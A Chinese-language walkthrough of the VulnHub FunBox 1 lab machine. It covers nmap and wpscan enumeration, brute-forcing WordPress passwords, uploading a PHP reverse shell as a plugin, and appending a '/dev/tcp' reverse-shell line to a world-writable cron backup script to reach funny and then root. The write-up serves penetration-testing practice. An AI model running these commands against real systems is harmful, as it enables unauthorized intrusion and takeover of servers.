运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:FunBox 1(10.0.2.26)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/
使用nmap主机发现靶机ip:10.0.2.26
使用nmap端口扫描发现靶机开放端口:21、22、80
打开网站,访问ip会跳转到funbox.fritz.box
域名,修改hosts文件,vim /etc/hosts
添加一条数据,再次访问网站
10.0.2.26 funbox.fritz.box
使用dirsearch爆破目录,发现网站为wordpress模板搭建的
直接使用wordpress扫描器wpscan进行扫描
wpscan --url http://funbox.fritz.box/ --enumerate u,p,t --plugins-detection aggressive --detection-mode aggressive
枚举到两个用户名:joe、admin
,使用wpscan对这两个用户进行暴力破解
wpscan --url http://funbox.fritz.box/ -P /usr/share/wordlists/rockyou.txt -U user.txt -t 100
破解成功:joe\12345、admin\iubire
登录admin账户
直接在安装Plugin处上传php-reverse-shell.php
文件,无需压缩,可能没有返回成功上传的提示,但是到/wp-content/uploads
即可看到所上传的文件
获取shell
使用python获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
访问home目录可以看到有两个用户,funny和joe
看到joe用户,想到使用wpscan暴力破解的得到的:joe\12345
,是不是可以用这个用户名密码登录joe的ssh呢,登录ssh,登录成功
好吧,发现joe用户cd命令受限,还是使用web漏洞得到的shell吧
在joe的home目录下发现一个mbox文件,查看是一个邮件信息
嗨,joe,请告诉funny备份脚本已经完成。
可查看funny的home目录,有一个.backup.sh
备份脚本,所有用户都具有读写执行权限
查看备份脚本,该脚本会把/var/www/html
目录备份
仔细观察发现funny目录下的html.tar
创建时间会随着时间变化而变化,可猜测funny用户对备份脚本创建了计划任务,每分钟备份一次
我们可以在备份脚本写入反弹shell命令,来获取shell
echo "bash -i >& /dev/tcp/10.0.2.15/8888 0>&1" >> /home/funny/.backup.sh
耐心等待,反弹shell成功
获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
发现获取的shell为funny的shell,找了一圈,没有发现获取root权限的方法
上传pspy64查看靶机的进程,有一个root的计划任务和funny的计划任务,root是5分钟执行一次,funny用户是2分钟执行一次
重新监听,多监听几次,成功拿到root权限shell
获取flag